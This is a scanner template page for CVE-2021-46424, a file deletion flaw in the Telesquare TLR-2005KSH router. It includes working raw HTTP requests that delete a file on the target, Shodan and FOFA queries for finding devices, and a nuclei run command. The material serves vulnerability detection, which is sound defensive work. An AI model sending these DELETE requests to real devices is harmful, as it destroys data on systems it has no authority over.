Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
ID: CVE-2021-46424
Severity: critical
Author: gy741
Tags: cve2021,cve,telesquare,intrusive,packetstorm
Description
Section titled “Description”Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
YAML Source
Section titled “YAML Source”id: CVE-2021-46424
info: name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete author: gy741 severity: critical description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request. impact: | Successful exploitation could lead to loss of critical data or system instability. remediation: | Apply the latest patch or update provided by the vendor to fix the vulnerability. reference: - https://dl.packetstormsecurity.net/2205-exploits/tlr2005ksh-filedelete.txt - https://drive.google.com/drive/folders/1_e3eJ8fzhCWnCkoRpbLoyQecuKkPR4OD?usp=sharing - http://packetstormsecurity.com/files/167127/TLR-2005KSH-Arbitrary-File-Delete.html - https://nvd.nist.gov/vuln/detail/CVE-2021-46424 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-46424 cwe-id: CWE-306 epss-score: 0.0159 epss-percentile: 0.86024 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: telesquare product: tlr-2005ksh_firmware shodan-query: - http.html:"TLR-2005KSH" - http.html:"tlr-2005ksh" fofa-query: body="tlr-2005ksh" tags: cve2021,cve,telesquare,intrusive,packetstorm
http: - raw: - | GET /images/icons_title.gif HTTP/1.1 Host: {{Hostname}} - | DELETE /images/icons_title.gif HTTP/1.1 Host: {{Hostname}} - | GET /images/icons_title.gif HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"# digest: 4b0a00483046022100d5b3b74be145821fbe14c6378c89d202bc0df1666c878b44ee636c7ec8ee399e022100f30517c6ae1f7b9522f902be4a72750d6e505ceed0874d8a244f282452a9d914:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46424.yaml"